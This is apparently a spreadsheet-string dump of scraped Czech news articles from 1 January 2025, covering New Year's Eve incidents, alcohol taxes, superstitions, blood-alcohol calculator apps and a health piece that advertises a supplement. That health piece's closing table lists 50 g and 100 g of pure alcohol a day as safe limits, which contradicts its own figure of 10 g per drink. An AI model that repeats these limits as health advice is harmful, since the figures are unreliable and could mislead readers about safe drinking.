    <t>20250101_4_3698494042_649d9d85bb4f3fd25b02.html</t>
  </si>
  <si>
    <t>649d9d85bb4f3fd25b02</t>
  </si>
  <si>
    <t>Databáze hodnocení vín z Moravy a Čech. Inspirujte se.</t>
  </si>
  <si>
    <t>Databáze hodnocení vín z Moravy a Čech. Inspirujte se. Aktuálně , 7. 1. 2025 ( 3 komentáře ) Hodnotitelé na portálu MojeLahve.cz v roce 2024 body nešetřili, ty vystoupaly k historickému maximu. Dominantní byla v tomto směru vína Vinařství Volařík, která obsadila tři z pěti nejvyšších příček v individuálním pořadí a celkem pochopitelně byla nejvýše i v kolekcích. V pořadí vinařství však první místo patří Vinařství Garčic. číst více Aktuálně , 4. 1. 2025 ( 5 komentářů ) Někteří hodnotitelé sice vyklízejí pozice, jeden se ale drží na špici už od roku 2016. V enormně těsném souboji letos o vítězi rozhodlo rekordních pět bodů. V tomto případě spravedlivě, co se týče počtu hodnocených vín, zvítězil by totiž o více než dvě stovky. Přinášíme vám tradiční novoroční statistiky portálu zaměřené na obsah a aktivitu hodnotitelů. číst více Recenze a testy vín , 1. 1. 2025 První článek v novém roce se vlastně ještě vrací k hodnocení z roku minulého. Proto si uděláme takové „vinné menu" různých typů vín, která by mohla fungovat i v rámci jedné příležitosti. Spojovat je bude rodina burgundských odrůd, které můžeme také nazvat jako „pinotové". číst více Rozhovory , 29. 12. 2024 ( 11 komentářů ) Vinařství Skoupil je etablovanou značkou. Její zakladatel Petr Skoupil ji začal budovat už na počátku devadesátých let a byl ve své době jedním z vůbec nejznámějších a nejúspěšnějších vinařů. Značka se ale dále vyvíjí a dobře konkuruje i v těžší současné konkurenci v době, kdy směřování rodinného podniku čím dál více ovlivňuje nastupující generace Skoupilů. S enologem Františkem Skoupilem jsme si právě o této budoucí cestě povídali, ale zmínili jsme i obecnější témata vinařského dění. číst více Recenze a testy vín , 26. 12. 2024 ( 2 komentáře ) Období konce roku je ideální k rozmazlení se zajímavými víny, která už mají nějaký ten rok v lahvi za sebou. Dospělá, u kterých si už jen nepředstavujete, jak budou za dva roky vypadat, ale vychutnáte si je v jejich aktuální podobě. číst více Encyklopedie vína , aktualizováno 22. 12. 2024 ( 14 komentářů ) Orientovat se v nabídce šumivých vín jsme vám snad už trochu pomohli, zkusíme se tedy nyní zaměřit na praktickou stránku – jak si je co nejlépe vychutnat. Jak klasický sekt skladovat, otevřít, do jakých sklenic a při jaké teplotě podávat. Přizvali jsme si k tomu i odborníka z nejpovolanějších – trojnásobnou vítězku Sommelier Moravy a aktuální vicemistryni ČR Bohemia Sekt Trophée Natálii Válkovou. číst více Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_40_3698273953_5f5a7d718b4b673e54d7.html</t>
  </si>
  <si>
    <t>5f5a7d718b4b673e54d7</t>
  </si>
  <si>
    <t>Silvestrovské oslavy</t>
  </si>
  <si>
    <t>Silvestrovské oslavy Petr SUCHOŇ , moderátor: Silvestrovské oslavy se ani letos neobešly bez konfliktů a potyček. Záchranáři pomáhali lidem, kteří to přehnali s alkoholem nebo se zranili při odpalování pyrotechniky. Eva JARKOVSKÁ, reportérka: Do půlnoci to vypadalo, jako by se v metropoli žádný Silvestr ani neslavil. Jakmile odbila dvanáctá, policisté se nezastavili. Eva KROPÁČOVÁ, mluvčí Policie ČR hl. m. Prahy : Úderem půlnoci však došlo k většímu použití pyrotechniky, a to především na Václavském a Staroměstském náměstí , kde to ale policisté okamžitě na místě aktivně řešili a na místě ukládali přímo blokové pokuty. Eva JARKOVSKÁ, reportérka: Na tísňové lince operační přijeli každou minutu jedno oznámení. Lidé hlásili drobnější požáry a potyčky. Vojtěch SOSNA, mluvčí HZS hl. m. Prahy: Zasahovali jsme od klasických případu typu požáry odpadkových košů, požáry porostu a máme za sebou jeden požár předmětu uložený na balkoně. Neuvedeno: Hned několik policejních hlídek vyráželo zhruba hodinu po půlnoci do baru na pražský Smíchov . Byla tady totiž hlášená hromadná rvačka. Eva JARKOVSKÁ, reportérka: V Praze deset vzal opilý muž do ruky kladívko a rozhodl se, že bude demolovat. Rozbíjel okýnka u zaparkovaných aut, poškodil jich celkem deset. Jiný opilec nejdřív hodil po policejním vozidle skleněnou lahev, pak se chtěl prát. Nadýchal tři promile. Oslava se zvrtla na jedné z ubytoven. Osmnáctiletá dívka je podezřelá z těžkého ublížení na zdraví. Eva KROPÁČOVÁ, mluvčí Policie ČR hl. m. Prahy : Při konfliktu jedna osoba utrpěla řezné poranění a na místo musela být přivolána záchranná služba. Eva JARKOVSKÁ, reportérka: V centru metropole záchranáři ošetřovali lidi v takzvaném golemu, už ve vozidle, které slouží právě pro případy většího počtu zraněných. Ondřej ŠEDIVKA, záchranář: Jednalo se o události v souvislosti opět s užíváním alkoholu a letos i o trochu víc s užíváním pyrotechniky, hlavně právě u poranění očí. Eva JARKOVSKÁ, reportérka: V celé Praze pak záchranáři kvůli oslavám vyjeli ke 100 událostem, z toho v devíti případech ošetřovali zraněné. Ve Středočeském kraji měli záchranáři noc klidnější. Ošetřili šest lidí, kteří se zranili při odpalování pyrotechniky. 46 oslavenců potřebovalo pomoc, protože to přehnali s alkoholem . Redakce a Eva Jarkovská, CNN Prima News.</t>
  </si>
  <si>
    <t>20250101_400_3692934420_689a16084e5d0f8a0e27.html</t>
  </si>
  <si>
    <t>689a16084e5d0f8a0e27</t>
  </si>
  <si>
    <t>Oslavy konce roku v Česku: Tisíce turistů ovládly na silvestra centrum metropole</t>
  </si>
  <si>
    <t>Oslavy konce roku v Česku: Tisíce turistů ovládly na silvestra centrum metropole Na Staroměstském náměstí v Praze turisté během úterního podvečera navštěvovali stánky na vánočních trzích. Kvůli chladnému počasí, na které si v mnoha případech stěžovali, pak konzumovali hlavně čaj, svařené víno a další teplé nápoje. Restaurace na Starém Městě byly v úterý z velké části plné již v odpoledních hodinách. Zhruba v 17:00 začal na náměstí silvestrovský program na provizorním pódiu. Až do půlnoci se zde budou střídat česko-britská poprocková kapela So Fine a DJ Jan Meruna. ČTĚTE DÁLE: Věštby a karty o roce 2025. Jak to bude s válkou na Ukrajině a čeká Česko korupční skandál? Pražská zdravotnická záchranná služba v tiskové zprávě uvedla, že během silvestrovské noci v hlavním městě posiluje ve večerních a ranních hodinách svůj provoz. Na Staroměstské náměstí dorazilo záchranářské vozidlo Golem, které je vybaveno 12 lůžky. Každoročně ošetřuje například lidi poraněné pyrotechnikou. Na náměstí pak budou umístěny tři další záchranářské posádky, aby se pomoc k pacientům na zaplněném náměstí dostala co nejdříve. Podle záchranné služby budou dvě záchranářské posádky umístěny i na Václavském náměstí . Vzhledem k rozsáhlým stavebním pracím ale letos záchranáři nepředpokládají takovou intenzitu novoročních oslav, jak bývá obvyklé. Stavba v horní části náměstí značně komplikuje pohyb a prakticky ho rozděluje na dvě části. Z jedné strany na druhou lze procházet pouze v některých místech. Novoroční oslavy sleduje ve zvýšeném počtu i policie. Tisíce policistů v celé republice dohlédnou na bezpečnost při nadcházejících oslavách příchodu nového roku. Zaměří se na frekventovaná místa i na takzvané měkké cíle, což jsou například obchodní centra, letiště, nádraží a další prostory s velkou koncentrací lidí a nízkou úrovní zabezpečení. Například na Václavském náměstí již od úterního odpoledne hlídkovali policisté s dlouhými zbraněmi. V pohotovosti jsou během silvestrovské noci i hasiči. Podle agentury Aktu už před půlnocí řešili požár v pražské Spálené ulici. Na balkoně hořely odpadky a pyrotechnika. Praha pod náporem turistů Během uplynulého prosince dorazilo do Prahy podle odhadů Prague City Tourism asi 600 tisíc turistů. Na silvestrovskou noc hotely a další ubytovací zařízení v hlavním městě přivítaly dokonce odhadem až 100 tisíc klientů. Průměrně hosté v metropoli strávili maximálně pět dnů. „Celkově za rok 2024 očekáváme v Praze obsazenost hotelů ze 71 procent. Obsazenost hotelů v celé České republice byla asi 60 procent,“ popsal pro CNN Prima NEWS prezident Asociace hotelů a restaurací Václav Stárek. „Období před covidem, tedy rok 2019, jsme překonali, prakticky už v loňském roce,“ doplnil. Výrazný nárůst hlásilo i největší letiště v zemi: Letiště Václava Havla v Praze . Jen za sváteční týden od 23. do 29. prosince letiště odbavilo na příletech 147 tisíc cestujících, což je zhruba o 24 tisíc více než vloni. „Z toho zhruba 63procentní podíl mají zahraniční cestující. Ukazuje se tedy zvýšený zájem právě zahraničních cestujících, a to i v kontextu celého roku,“ uvedl mluvčí letiště Jiří Hännich. „Když se podíváme na celý rok 2024, tak zahraniční cestující měli celkový podíl na příletech 55 procent,“ dodal. MOHLO BY VÁS ZAJÍMAT: Jágr přišel při zápase o několik zubů. Zranění vtipně okomentoval, přidali se další sportovci</t>
  </si>
  <si>
    <t>20250101_401_3692823459_f35d3d6b9a8ff6e16038.html</t>
  </si>
  <si>
    <t>f35d3d6b9a8ff6e16038</t>
  </si>
  <si>
    <t>Nový rok bez výčitek a zdravotních obtíží. Stačí se jen nepřejídat, pravidelně se hýbat a pít dostatek vody Praha 1. ledna 2025 Známe to všichni. Konec roku se všeobecně nese v duchu radostných večírků a milých setkání, v rámci kterých jde zdravý životní styl zkrátka stranou. Nedostatečný spánek, který sotva splňuje 7 hodin, kaloricky nabitý jídelníček, omezení sportovních aktivit a sporadický pitný režim založený více na alkoholu než čisté vodě. Přestože je naše tělo na určitý nápor připravené, má také své hranice a limity. Aby následky nebyly větší než samotné oslavy, je nutné organismu pomoct a snažit se negativní dopad bujarého období minimalizovat. Není však potřeba se veselí vyloženě vzdát a předepisovat si přísné diety! Jak tedy efektivně zvýšený kalorický příjem kompenzovat? Oslavy plné pohody, radosti a neomezené hojnosti Domácí cukroví, obložené mísy, nazdobené chlebíčky a hora bramborového salátu, který teprve s vydatnou porcí majonézy dostává ten pravý šmrnc. Svátky se zkrátka bez tradičních pochutin, šumivých přípitků a večerů plných zábavného programu, který častokrát končí až v ranních hodinách, neobejdou. Přestože se na vánoční období a aktivity s ním spojené většina z nás těší celý rok, pro lidský organismus jsou to dny intenzivní kompenzace našich rozhodnutí, nejen z pohledu výživy, ale i dočasného životního tempa. Důsledkem nadměrného příjmu cukrů, tuků, alkoholu a nedostatečného pohybu společně se zhoršenou spánkovou hygienou dochází k přetížení hned několika významných systémů. „Nárazové a intenzivní přejídání, konzumace alkoholu a narušení spánkového režimu může být pro tělo ještě horší než dlouhodobě mírné odchýlení od zdravého životního stylu. Kromě metabolismu, který má omezenou schopnost zpracovávat velký nával kalorií a energie, proto přebytečné cukry ukládá v podobě tuku do různých částí těla, trpí také střevní mikrobiom. Vysoký příjem alkoholu , tuků a cukrů způsobuje rychlou změnu jeho složení, čímž se značně narušuje jeho rovnováha,“ komentuje Ing. et Ing. Barbora Procházková , Ph.D. , jež se mimo jiné podílí i na vývoji genetických testů a testování střevního mikrobiomu v Chromozoom. Genetička také upozorňuje, že vlivem přebytečných tuků a cukrů dochází rovněž k dočasnému poškození jater, například v podobě steatózy (ztučnění jater). „Steatóza jater může vznikat velmi rychle, někdy již během několika dnů až týdnů, pokud dochází k nadměrnému příjmu kalorií, zejména cukrů a tuků, nebo alkoholu . Naštěstí je v raných stádiích tento stav reverzibilní při návratu ke zdravému životnímu stylu. Alkohol také podporuje produkci volných radikálu, které taktéž poškozují jaterní buňky. I funkce endokrinního systému může být tímto dočasným způsobem života značně ovlivněna. Nárazová změna je častokrát příčinou narušení hormonální rovnováhy, což může vést ke zhoršení spánku, ale také psychického stavu,“ dodává . Kromě špatné nálady ale může dojít i k narušení správné funkce hormonů souvisejících s chutěmi a pocitem hladu. Zde však pozor! Ne vždy je totiž spouštěčem výhradně špatný životní styl. Chutím zkrátka neporučíš! Není tajemstvím, že nutkavý pocit vyššího příjmu určitých potravin bohatých především na tuky a cukry je častokrát jen kompenzací konkrétních stavů, které se v těle dočasně odehrávají. Nedostatek spánku, náhlý pokles energie, prudké hormonální výkyvy či jen upuštění od přísných dietních návyků, které se snažíme dodržovat. Věděli jste však, že chutě mohou být podmíněny také geneticky? „DNA se skutečně může podílet na zvýšených chutích, a ovlivňovat tak chuťové preference a metabolické procesy. Například lidé s určitým polymorfismem genu TAS2R38, který zodpovídá za citlivost na hořkost, mají intenzivnější potřebu a častěji preferují sladké nebo také tučné potraviny. Mutace genu MC4R (melanokortinového 4 receptoru) jsou nejčastější genetickou příčinou obezity. Tento gen hraje klíčovou roli v regulaci pocitu sytosti a hladu. Jeho mutace mohou vést ke zvýšené chuti k jídlu, zejména k preferenci energeticky bohatých potravin, což zvyšuje riziko nadváhy a obezity. Také varianty genu FTO ovlivňují sklony ke konzumaci většího množství kalorií, zejména prostřednictvím energeticky bohatých jídel, jako jsou tučné a sladké potraviny,“ vysvětluje Procházková . Vánoce proto mohou být pro jedince s těmito genetickými predispozicemi opravdovou zkouškou ohněm. Podle genetičky Procházkové však existují způsoby, jak jednoduše chutě uspokojit a zároveň tělo zbytečně nezatěžovat: „Jednou z možností jsou zdravější varianty potravin. Místo klasických sladkostí, které kromě rafinovaného cukru překypují také dalšími uměle vytvořenými dochucovadly, volit raději alternativy slazené ovocem, medem či stévií. To stejné platí i u tuků. Ideálním zdrojem je například avokádo nebo různé druhy ořechů a semínek. Velmi prospěšné je také plánování jídla, které by vždy mělo obsahovat dostatečnou porci bílkovin pro lepší zasycení a vlákniny, která zajišťuje stabilizaci cukru v krvi a je navíc důležitá pro náš mikrobiom.“ Jak tedy intenzivní oslavy kompenzovat bez striktních pravidel? Každý si chce novoroční oslavy užít naplno a dopřát si vše, na co se celý rok tak těšil. Aby se však člověk s následky bujarých večerů nepotýkal ještě dlouho po jejich konci, není třeba si něco zakazovat. Stačí se jen zaměřit na určitá doporučení, díky kterým si svátky člověk užije plnými doušky bez budoucích výčitek a zdravotních komplikací v podobě zvýšené hmotnosti, oslabení svalové kondice či zažívacích potíží v důsledku narušeného střevního prostředí. Přestože nelze vypíchnout, jaká látka je pro člověka tou nejrizikovější, dle genetičky Procházkové je vhodné minimalizovat příjem především nadměrného alkoholu a trans tuků, které mají nejškodlivější dopad. „Přestože nelze z důvodu individuality každého z nás přesně stanovit, kde se nachází ta pomyslná hranice, kterou z pohledu zdraví není vhodné překračovat, existují obecná doporučení, jež mohou být velmi užitečným vodítkem a nápovědou. Přidaného cukru by dospělý člověk neměl sníst více než 50 g, což je přibližně 10 % celkového kalorického příjmu na den. Přesáhnutí této hodnoty je vhodné kompenzovat fyzickou aktivitou, která nadbytek glukózy využije v rámci spálené energie. Užitečné je také do jídla zařadit dostatek vlákniny, která podporuje trávení, pomáhá regulovat hladinu cholesterolu a zároveň zpomaluje vstřebávání cukrů. Tuky by měl člověk čerpat především ze zdravých zdrojů a neměly by přesáhnout 35 % denních kalorií. Co se týče alkoholických nápojů, bezpečnou hranicí pro ženy je jeden drink, tedy maximálně 10 gramů čistého alkoholu , a pro muže dva. Pokud však člověk pije více, měl by rovněž zvýšit i příjem čistých tekutin, nejlépe vody, díky čemuž pomůže játrům a ledvinám se lépe zbavit nežádoucích toxinů. Celkovou funkci organismu, který během svátků člověk zatěžuje více než obvykle, je vhodné podpořit například i doplňky stravy. V Chromozoom jsme s odborným týmem vyvinuli suplement Detoxify, který příznivě působí na trávení, je účinným pomocníkem jater při detoxikaci a optimalizuje také funkci ledvin,“ doplňuje Procházková . Klíčem ke klidným svátkům bez výčitek je především takzvané mindful eating, tedy vědomé jezení. Místo přecpávání a bezmyšlenkovitého ochutnávání všeho, co člověku přijde pod ruce, je vhodné jídlu opravdu věnovat pozornost, jíst pomalu a užít si každé sousto. Nejenže požitek z každoročního svátečního pohoštění je o to větší, zároveň dáváme tělu dostatek času si situaci uvědomit a náležitě se na ni připravit. Není třeba se během svátků omezovat, je však vhodné chvilkové požitky kompenzovat, a být tak tělu nápomocný. Hranice bezpečného hodování CUKRY Hranice: 10 % celkového kalorického příjmu (pro průměrného dospělého člověka je to 50 g přidaného cukru na den) Vhodný způsob snížení jejich dopadu: Nahradit zdravější variantou slazenou ovocem, medem či stévií, zařadit do jídelníčku více vlákniny společně s bílkovinami, zvýšit energetický výdej vhodnou sportovní aktivitou TUKY Hranice: 20-35 % celkového kalorického příjmu Vhodný způsob snížení jejich dopadu: Nahradit zdravější variantou v podobě avokáda, ořechů a semínek, zvýšit energetický výdej vhodnou sportovní aktivitou ALKOHOL Hranice: 50 g čistého alkoholu pro ženu na den (přibližně 1 alkoholický nápoj), 100 g čistého alkoholu pro muže na den (přibližně 2 alkoholické nápoje) Vhodný způsob snížení jeho dopadu: Navýšit příjem čisté vody, před konzumací doplnit elektrolyty, suplementace vitamínů například B-komplex Autor: Svetozár Plesník Autor person Svetozár Plesník Rubrika transition_slide Zdraví</t>
  </si>
  <si>
    <t>20250101_402_3692792522_f67aea9612053ce3d55b.html</t>
  </si>
  <si>
    <t>f67aea9612053ce3d55b</t>
  </si>
  <si>
    <t>Stíny 1. ledna</t>
  </si>
  <si>
    <t>Stíny 1. ledna Středa, 01 Leden 2025 00:00 Řidič byl pod vlivem alkoholu V pondělí 30. prosince zastavili policisté v obci Dalešice po jedné hodině ráno vozidlo Škoda a provedli kontrolu. U čtyřiatřicetiletého řidiče při dechové zkoušce naměřili hodnotu 0,42 promile alkoholu . Obdobnou hodnotu u něho ukázala také opakovaná zkouška. V další jízdě řidič již nesměl pokračovat, řidičský průkaz při kontrole nepředložil. Muž je podezřelý ze spáchání přestupkového jednání na úseku dopravy. Jana Kroutilová Aktualizováno Sobota, 04 Leden 2025 11:29 Autor: Administrator Rubrika transition_slide Stíny</t>
  </si>
  <si>
    <t>20250101_403_3692771823_69d2e51042dad7f44f6a.html</t>
  </si>
  <si>
    <t>69d2e51042dad7f44f6a</t>
  </si>
  <si>
    <t>Od ledna 2025 v Česku citelně vzrostla spotřební daň na alkohol i na cigarety</t>
  </si>
  <si>
    <t>Od ledna 2025 v Česku citelně vzrostla spotřební daň na alkohol i na cigarety. Od ledna 2025 v Česku citelně vzrostla spotřební daň na alkohol i na cigarety. Kvůli konsolidačnímu balíčku, který prosadila Fialova vláda, vzroste v roce 2025 spotřební daň u tabáku a tabákových výrobků o 5 %, u zahřívaného tabáku o 15 % a u alkoholických nápojů o 10 %. Podle ministerstva financí patří mezi důvody zvýšení daní snaha o zlepšení zdraví lidí, boj se závislostmi i uskutečnění doporučení Národní ekonomické rady vlády (NERV) pokračovat v úsporných opatřeních ve veřejných rozpočtech. Spotřební daň u cigaret, tabáku, doutníků a obdobných výrobků od ledna vzroste o 5 procent. Stejným tempem sazby spotřební daně porostou i v letech 2026 a 2027. Nadto se v letech 2025 až 2027 navýší sazba spotřební daně u zahřívaného tabáku a to o 15 procent každý rok. „Rychlejší růst sazeb u zahřívaného tabáku sleduje vývoj v okolních zemích a odborníky doporučované přiblížení zdanění zahřívaného tabáku k cigaretám,“ uvedlo ministerstvo financí. Od ledna 2025 se také zvyšuje spotřební daň na lihoviny a to o deset procent. K navýšení o dalších 5 % dojde i v roce 2026. Na základě trvalé výjimky od Evropské unie ale bude pěstitelské pálení pro vlastní spotřebu pěstitele zatíženo spotřební daní pouze v poloviční výši běžné sazby. Pro rok 2024 činila spotřební daň u pěstitelské pálenice 178 korun za litr stoprocentního lihu. Podle ministerstva financí se za prvních 11 měsíců roku 2024 na spotřební dani vybralo asi o sto milionů korun méně než v předchozím roce. (sfr) Autor: sefredaktor</t>
  </si>
  <si>
    <t>134</t>
  </si>
  <si>
    <t>20250101_404_3692763233_d2c651bf67b4a5e9d721.html</t>
  </si>
  <si>
    <t>d2c651bf67b4a5e9d721</t>
  </si>
  <si>
    <t>Středočeští hasiči mají desítky výjezdů, většinou k&amp;nbsp;požárům</t>
  </si>
  <si>
    <t>Středočeští hasiči mají desítky výjezdů, většinou k&amp;nbsp;požárům Středočeští hasiči měli desítky výjezdů, většinou k požárům Středočeští hasiči během poslední noci minulého roku zasahovali u více než stovky událostí, z toho více než polovinu tvořily požáry. Několik lidí si opět způsobilo zranění petardami a desítky lidí nezvládly alkohol . Například v Kamenných Žehrovicích na Kladensku museli hasit drážní domek. „Pomocí navijáku jsme museli strhnout plechovou střechu, abychom se dostali i ke skrytým ohniskům,“ uvedli hasiči na síti X s dodatkem, že kvůli silnému dýmu zasahovali v dýchací technice. Zbylé zásahy se týkaly většinou dopravních nehod nebo technické výpomoci a ve třech případech unikaly nebezpečné látky. Výrazně přibylo otrav alkoholem Pernou noc si prožili také záchranáři. „Během letošních silvestrovských oslav jsme zasahovali u šesti pacientů, kteří se zranili zábavní pyrotechnikou, a čtyři lidé se od ní popálili. V péči jsme měli 46 lidí s intoxikací alkoholem ,“ informovala Novinky ráno na Nový rok mluvčí středočeské záchranné služby Monika Nováková. Ve srovnání s loňskými oslavami bylo zranění od petard a otrav alkoholem výrazně víc. Před rokem záchranáři během silvestrovské směny ošetřili tři zranění od petard a dvanáct opilců. Požár drážního domku v Kamenných Žehrovicích na Kladensku Požár drážního domku v Kamenných Žehrovicích Autor: Radek Plavecký Autor person Radek Plavecký</t>
  </si>
  <si>
    <t>20250101_405_3692743985_f17a9a35688ad5f50a9d.html</t>
  </si>
  <si>
    <t>f17a9a35688ad5f50a9d</t>
  </si>
  <si>
    <t>Jak na Nový rok, tak po celý rok. Na co byste dnes rozhodně neměli zapomenout, aby se vás celý rok drželo štěstí</t>
  </si>
  <si>
    <t>Jak na Nový rok, tak po celý rok. Na co byste dnes rozhodně neměli zapomenout, aby se vás celý rok drželo štěstí Nový rok byl vždy spojován s bujarým veselím. Ovšem naši předkové si dávali dobrý pozor na to, co na Nový rok mohou, mají nebo naopak nemají dělat. Vždy se tento den považovat jako předzvěst toho, co nás v následujících dvanácti měsících čeká. Údajně tak můžeme ovlivnit svůj osud i následující dny. Právě dnes je proto třeba zajistit si pevné zdraví, klid, pohodu i blahobyt. S Novým rokem je pochopitelně spjato nespočet zvyků, tradic a také pranostik. Pojďme si tedy některé z nich připomenout. Nový rok začnete s čistým štítem Slíbili jste někomu něco nebo dlužíte? Pak byste měli své věci uvést ještě dnes dopořádku. Jestliže si přenesete resty z roku minulého do toho nového, pak počítejte, že toto téma se s vámi potáhne i nastávající měsíce. Jste s někým pohádaní, nemluvíte spolu? Urovnejte spory a potřeste si rukou. Ani omluva neuškodí. Zkrátka a dobře se snažte začít Nový rok tak, abyste se nemuseli čímkoliv trápit. Nový rok v různých koutech světa. Jak jej lidé oslavují? Plánování versus improvizace: Jak začít nový rok úspěšně? Slavnostní novoroční menu. Zkuste to letos na Nový rok trošku jinak, netradičně Úklid na Nový rok I když možná máme ještě trochu kocovinu a nic se nám nechce, přeci jenom bychom se měli postavit Novému roku čelem a začít jej tak, jak to dělali i naši předci. Po silvestrovské noci ukliďte a byt či dům důkladně vyvětrejte a provoňte. Oblékněte si něco čistého nebo rovnou úplně nového. Převlékněte povlečení, vyneste koš se smetím, ale v žádném případě nezametejte, tak byste vymetli štěstí z domu. A nezapomeňte uklidit všechno vyprané prádlo. V žádném případě však neperte další várku prádla! Pokud byste jej totiž pověsili, mohlo by vám ulétnout štěstí. Navíc praní i věšení prádla může přinést do rodiny neštěstí i smrt. A pozor: ani s úklidem to nepřehánějte, abyste se během roku neudřeli. Nový rok a návštěvy Podle všech možných pověr má právě Nový rok obrovskou magickou moc. A dokonce vám může dát nahlédnout do budoucnosti. Přijde-li k vám nějaká návštěva nebo třeba jen někdo ze sousedů půjčit si mléko, které mu došlo, věnujte mu pozornost. Pokud je to dítě, je to dobré znamení a může vám přinést do života lásku. Špatné to nebude ani v případě, že půjde o mladou dívku či muže, to se vás bude držet štěstí. Ale pozor v případě, že u vás zazvoní stará dáma, to nevěstí nic dobrého. Nosí totiž smůlu. A na Nový rok se v žádném případě s nikým nehádejte, jinak by vás hádky provázely i další měsíce. Jídlo na Nový rok Na Nový rok bychom se měli pořádně najíst. Dříve se ihned po silvestrovské půlnoci podávaly prasečí rypáčky nebo ovar. Prase je totiž symbol štěstí. Pokud jej zkonzumujeme, budeme se radovat i my. Tučné jídlo se pak zajídalo nastrouhanými jablky s křenem. Dnes je však spíše populární novoroční čočka, ale může být i hrách. Takový pokrm nám má přinést hojnost peněz. Ale pozor: na Nový rok je zcela zapovězeno jíst drůbež nebo králíka, aby nám neuteklo štěstí. V případě ryby může dokonce uplavat. Pokud jste nezapomněli upéct novoroční vánočku a zapekli do ní kuličku hrášku, dejte si ji hned k snídani. Kdo hrášek najde, bude mít po celý rok velké štěstí. Pranostiky na Nový rok Na Nový rok, o slepičí krok. Připadne-li Nový rok na středu, bude dostatek vína , ale málo medu. Svítí-li na Nový rok jasně slunce, bude hojná úroda. Na Nový rok déšť – o Velikonocích sníh. Na Nový rok, do zimy skok. Je-li dopoledne na Nový rok pěkně, bude příznivé počasí o žních v kraji, je-li pěkně odpoledne, bude o žni pěkně na horách. Jestli na Nový rok třeba jen tolik slunka zasvítí, co by vozka bičem mrsknul, bude srpen jasný. Když je začátkem ledna krásně, budou zjara bouřky časně. Když je na Nový rok hezky, bude tak i o žních. Vane-li na Nový rok vítr od půlnoci, vyznamenává to neúrodu. Jsou-li červánky v novoroční den, přinesou jistě samou slotu jen. Na Nový rok ráno nebe rudé – nepohoda, svízel velká bude. ZA CELOU REDAKCI VÁM PŘEJEME ÚSPĚŠNÝ A ŠŤASTNÝ VSTUP DO ROKU 2025. Autor: Monika Poledníková Autor person Monika Poledníková</t>
  </si>
  <si>
    <t>5190</t>
  </si>
  <si>
    <t>20250101_406_3693207377_70164dca65ab0f120034.html</t>
  </si>
  <si>
    <t>70164dca65ab0f120034</t>
  </si>
  <si>
    <t>Opilé nehody. Pojišťovny spočítaly, kde se nejvíc bourá, hříšníkům zdraží</t>
  </si>
  <si>
    <t>Opilé nehody. Pojišťovny spočítaly, kde se nejvíc bourá, hříšníkům zdraží Vánoční svátky jdou často ruku v ruce s návštěvami , ale i alkoholem . Pokud se ovšem na silnice vydá opilý řidič, riskuje zdraví, život i vysoké pokuty. Nejčastěji takové řidiče potkáte v pásu od Plzeňska přes jih Čech na jižní Moravu .... Celý článek naleznete na: www.lidovky.cz/... Autor: Lasty Webdesign Autor person Lasty Webdesign</t>
  </si>
  <si>
    <t>20250101_407_3692622644_c89278aa3f57376297f1.html</t>
  </si>
  <si>
    <t>c89278aa3f57376297f1</t>
  </si>
  <si>
    <t>Nejlepší aplikace na měření alkoholu v krvi pro rok 2025</t>
  </si>
  <si>
    <t>Nejlepší aplikace na měření alkoholu v krvi pro rok 2025 &amp;lt; &amp;gt; Sváteční dny jsou plné příležitostí k oslavám, a proto je důležité pamatovat na bezpečnost. Alkoholové kalkulačky vám pomohou nejen lépe odhadnout množství alkoholu v krvi, ale také vás mohou motivovat k odpovědnějšímu chování. Zde je výběr nejlepších aplikací, které můžete mít po ruce: Alkoholmetr: Alkohol kalkulačka Tato česká aplikace je jednoduchá na použití a dle recenzí také velmi spolehlivá. Zadejte základní údaje jako váhu, pohlaví a druh alkoholu , a aplikace vám spočítá orientační hladinu alkoholu v krvi. Skvělý pomocník při plánování návratu domů po novoročních oslavách. Fotogalerie Alkoholmetr Alkoholmetr1 Alkoholmetr2 Alkoholmetr3 Vstoupit do galerie Stažení v Google Play Alkohol kalkulačka Přehledná a intuitivní aplikace, která zahrnuje také databázi běžných nápojů. Umožňuje sledovat vývoj hladiny alkoholu během večera a odhadnout čas, kdy budete opět střízliví. Tento přístup je ideální pro zodpovědné oslavování Silvestra. Fotogalerie #2 Alkoholm Alkoholm1 Alkoholm2 Alkoholm3 Alkoholm4 Vstoupit do galerie Stažení v Google Play Alkohol kalkulačka Tato aplikace vás potěší možností přidat do seznamu vlastní nápoje. Hodí se například při experimentování se svátečními koktejly. Sleduje čas od posledního nápoje a nabízí přesné výpočty. Fotogalerie #3 Alkoholme Alkoholme1 Alkoholme2 Alkoholme3 Vstoupit do galerie Stažení v Google Play AlcoTrack: Alkohol kalkulačka AlcoTrack je robustní aplikace využívající vědecky ověřené výpočty. Nabízí grafy, historii spotřeby a mnoho nastavení podle individuálních parametrů. Můžete například zaznamenat, jak jídlo nebo rychlost metabolismu ovlivňují vstřebávání alkoholu . Perfektní volba pro technologicky nadšené uživatele. Fotogalerie #4 AlcoTrack AlcoTrack1 AlcoTrack2 AlcoTrack3 AlcoTrack4 Vstoupit do galerie Stažení v Google Play Alkoholmetr.cz Pokud se vaše oslavy rády protáhnou až do ranních hodin, webová stránka Alkoholmetr.cz může být vaším spolehlivým průvodcem. Tato platforma vám umožní sledovat nejen aktuální hladinu alkoholu v krvi, ale i odhadnout dobu potřebnou ke střízlivosti. Ideální volba, pokud plánujete po večírku bezpečně řídit nebo si jen chcete dát přehled o své konzumaci. Stránka funguje intuitivně: Vyplníte své údaje : jako pohlaví a hmotnost. Nastavíte čas konzumace : zvolíte časové okno, během kterého jste alkohol popíjeli. Zadáte nápoje : vyberete druhy a množství konzumovaného alkoholu z přehledného seznamu. Výsledkem je grafické zobrazení hladiny alkoholu , odhadovaný čas vystřízlivění a přesný moment, kdy budete schopni řídit. Stránka je přizpůsobena i mobilním zařízením, takže ji můžete používat kdykoliv a kdekoliv – třeba i během vánočních trhů. Webová stránka Bezpečné cesty Tato webová stránka vám nejen pomůže odhadnout hladinu alkoholu , ale také vám rovnou nabídne alternativní dopravu, pokud nemůžete řídit. Taxi nebo veřejná doprava jsou díky této aplikaci jen pár kliknutí daleko. Ideální, pokud jste se na novoročním flámu nechali unést více, než jste plánovali. Aplikace funguje na velice podobné bázi jako předchozí Alkoholmetr. Webová stránka Alkoholové kalkulačky jsou skvělým pomocníkem během vánočních a novoročních oslav, ale nenahrazují zdravý rozum. Používejte je jako orientační nástroj a nezapomínejte na zodpovědnost vůči sobě i ostatním. Tak krásné sváteční dny a bezpečný vstup do nového roku!</t>
  </si>
  <si>
    <t>2650</t>
  </si>
  <si>
    <t>34490</t>
  </si>
  <si>
